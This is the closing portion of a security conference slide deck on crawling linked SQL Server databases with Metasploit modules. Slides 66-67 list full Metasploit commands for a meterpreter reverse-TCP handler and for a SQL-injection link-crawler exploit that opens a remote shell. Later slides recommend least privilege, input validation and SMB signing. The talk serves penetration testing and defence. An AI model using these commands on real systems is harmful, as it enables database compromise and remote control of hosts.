  • 64. Database Link Crawling: Modules Two Modules 1. Direct connection 2. SQL Injection Available for Download • Not submitted to Metasploit trunk – Yet • Downloads available from nullbind’s github ‒ mssql_linkcrawler.rb ‒ mssql_linkcrawler_sqli.rb
  • 65. Database Link Crawling: Modules • Features ‒ Crawl SQL Server database links ‒ Standard Crawl output ‒ Verbose Crawl output ‒ Output to CSV file ‒ Supports 32 and 64 bit Windows ‒ Global Metasploit payload deployment ‒ Targeted Metasploit payload deployment ‒ Payload deployment via powershell memory injection
  • 66. Metasploit Module: Run multi/handler Setup the multi/handler module: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 443 set ExitOnSession false exploit -j -z
  • 67. Metasploit Module: Link Crawler Setup the mssql_linkcrawler_sqli module: use exploit/windows/mssql/mssql_linkcrawler_sqli set GET_PATH /employee.asp?id=1;[SQLi];-- set type blind set RHOST 192.168.1.100 set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.130 set lport 443 set DisablePayloadHandler true exploit
  • 68. Database Link Crawling: Attack! asef
  • 70. Do a crazy cat disco dance! Yes. It warrants 2 disco cats!
  • 71. Database Link Chaining: Modules Current Constraints • Cannot crawl through SQL Server 2000 • Cannot enable xp_cmdshell through links • Cannot deliver payloads to systems without powershell (at the moment) • Currently, the module leaves a powershell process running on exit • Currently, doesn’t allow arbitrary query execution on linked servers
  • 72. Conclusions configure all accounts with LEAST PRIVILEGE system accounts service accounts database accounts application accounts
  • 73. Conclusions always VALIDATE INPUT web apps thick apps mobile apps web services
  • 74. Conclusions Configure SMB SIGNING
  • 75. Conclusions don’t do DRUGS
  • 76. Questions Antti Rantasaari Email: antti.rantasaari@netspi.com Scott Sutherland Email: scott.sutherland@netspi.com Blog: http://www.netspi.com/blog/author/ssutherland/ Github: http://www.github.com/nullbind/ Twitter: @_nullbind Presentation Slides http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp- secusa2012